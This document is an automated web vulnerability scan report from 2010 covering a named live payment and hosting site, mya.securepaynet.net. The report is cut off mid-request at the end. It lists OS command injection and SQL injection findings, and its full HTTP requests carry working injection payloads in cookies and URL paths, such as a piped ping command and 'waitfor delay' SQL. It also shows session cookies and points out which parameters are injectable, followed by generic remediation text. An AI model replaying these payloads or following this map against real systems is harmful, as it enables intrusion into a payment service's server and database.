Recon and Analysis by Hoyt LLC

SQL Injection

Report generated by XSS.CX at Wed Oct 27 17:34:18 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. OS command injection

1.1. https://mya.securepaynet.net/products/accountlist.aspx [ShopperId459469 cookie]

1.2. https://mya.securepaynet.net/sitebuilder/hostingaccountlist.aspx [actioncount cookie]

2. SQL injection

2.1. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [REST URL parameter 3]

2.2. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [pathway cookie]

2.3. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [traffic cookie]

2.4. https://mya.securepaynet.net/default.aspx [app_pathway cookie]

2.5. https://mya.securepaynet.net/payment/Upgrades.aspx [SiteWidth459469 cookie]

2.6. https://mya.securepaynet.net/products/accountlist.aspx [traffic cookie]

3. SSL cookie without secure flag set

3.1. https://mya.securepaynet.net/login_redirect.aspx

3.2. https://mya.securepaynet.net/products/accountlist.aspx

4. Password field with autocomplete enabled

4.1. https://mya.securepaynet.net/default.aspx

4.2. https://mya.securepaynet.net/products/accountlist.aspx

5. Cookie scoped to parent domain

6. Cross-domain Referer leakage

6.1. https://mya.securepaynet.net/default.aspx

6.2. https://mya.securepaynet.net/products/accountlist.aspx

7. Cross-domain script include

7.1. https://mya.securepaynet.net/default.aspx

7.2. https://mya.securepaynet.net/products/accountlist.aspx

8. Cookie without HttpOnly flag set

9. Robots.txt file

10. SSL certificate



1. OS command injection  next
There are 2 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:



1.1. https://mya.securepaynet.net/products/accountlist.aspx [ShopperId459469 cookie]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The ShopperId459469 cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the ShopperId459469 cookie. The application took 28888 milliseconds to respond to the request, compared with 2061 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /products/accountlist.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd|ping%20-c%2020%20127.0.0.1||x; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 09:34:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

1.2. https://mya.securepaynet.net/sitebuilder/hostingaccountlist.aspx [actioncount cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://mya.securepaynet.net
Path:   /sitebuilder/hostingaccountlist.aspx

Issue detail

The actioncount cookie appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the actioncount cookie. The application took 99963 milliseconds to respond to the request, compared with 56472 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /sitebuilder/hostingaccountlist.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=%26ping%20-n%2020%20127.0.0.1%26; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 06:43:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2. SQL injection  previous  next
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /Account/AccountRetrieval/retrieveaccount.aspx

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3. The application took 76577 milliseconds to respond to the request, compared with 6265 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Account/AccountRetrieval/retrieveaccount.aspx',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response (redirected)

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 14:25:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2.2. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [pathway cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /Account/AccountRetrieval/retrieveaccount.aspx

Issue detail

The pathway cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the pathway cookie. The application took 117112 milliseconds to respond to the request, compared with 6265 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Account/AccountRetrieval/retrieveaccount.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a'waitfor%20delay'0%3a0%3a20'--; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response (redirected)

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 05:57:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2.3. https://mya.securepaynet.net/Account/AccountRetrieval/retrieveaccount.aspx [traffic cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /Account/AccountRetrieval/retrieveaccount.aspx

Issue detail

The traffic cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the traffic cookie. The application took 107912 milliseconds to respond to the request, compared with 6257 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Account/AccountRetrieval/retrieveaccount.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=',0,0)waitfor%20delay'0%3a0%3a20'--; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response (redirected)

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 13:56:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2.4. https://mya.securepaynet.net/default.aspx [app_pathway cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /default.aspx

Issue detail

The app_pathway cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the app_pathway cookie. The application took 28772 milliseconds to respond to the request, compared with 10548 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /default.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=',0)waitfor%20delay'0%3a0%3a20'--; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 09:10:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2.5. https://mya.securepaynet.net/payment/Upgrades.aspx [SiteWidth459469 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /payment/Upgrades.aspx

Issue detail

The SiteWidth459469 cookie appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the SiteWidth459469 cookie. The application took 96158 milliseconds to respond to the request, compared with 75114 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /payment/Upgrades.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000)waitfor%20delay'0%3a0%3a20'--; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response (redirected)

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 07:04:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

2.6. https://mya.securepaynet.net/products/accountlist.aspx [traffic cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The traffic cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the traffic cookie. The application took 69004 milliseconds to respond to the request, compared with 35524 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /products/accountlist.aspx HTTP/1.1
Host: mya.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; flag459469=cflag=us; SiteWidth459469=1000; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; currencypopin459469=cdisplaypopin=false; traffic=',0)waitfor%20delay'0%3a0%3a20'--; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=1; adc459469=US; ASP.NET_SessionId=b2rojz554y05ix45gunhku55; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; currency459469=potableSourceStr=USD;

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 26 Oct 2010 07:18:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.securepaynet.net/404error.asp?
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 159

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.securepaynet.net/404error.asp?">here</a>.</h2>
</body></html>

3. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://mya.securepaynet.net/login_redirect.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mya.securepaynet.net
Path:   /login_redirect.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_redirect.aspx?artifact=ZEMxOeWgbpKDLHEQOuwZmCukkqyiEpGt&ci=9106&prog_id=459469& HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: http://www.securepaynet.net/Hosting/web-hosting.aspx?prog_id=459469
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; traffic=; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcxhcewfsdlbeetbqilexcpcrikefhqbvaahwfpgvetivdrenbwdsdbfzcacbjfixb; ShopperId459469=kdzfjclhrdxhcfncvgchgjvdqamimcfb; MemShopperId459469=potableSourceStr=kdzfjclhrdxhcfncvgchgjvdqamimcfb

Response

HTTP/1.1 302 Found
Date: Wed, 27 Oct 2010 21:49:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB004&ci=9106&prog_id=459469
Set-Cookie: ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 213

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB004&amp;ci=9106&amp;prog_id=459469">here</a>.</h2>
</b
...[SNIP]...

3.2. https://mya.securepaynet.net/products/accountlist.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/accountlist.aspx?ci=1815&product=hosting&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: currency459469=potableSourceStr=USD; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; ShopperId459469=cetbeecepgqgtdhdaisijbddhjjgejti; adc459469=US; pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; pagecount=1; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 302 Found
Date: Tue, 26 Oct 2010 05:15:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&redirect=false&myaurl=%2fproducts%2faccountlist.aspx&ci=1815&product=hosting&prog_id=459469
Set-Cookie: ASP.NET_SessionId=b2rojz554y05ix45gunhku55; path=/; HttpOnly
Set-Cookie: ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; domain=securepaynet.net; expires=Mon, 26-Oct-2020 05:15:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&amp;redirect=false&amp;myaurl=%2fproducts%2faccount
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. https://mya.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.aspx?ci=9106&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: http://www.securepaynet.net/Hosting/web-hosting.aspx?prog_id=459469
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; 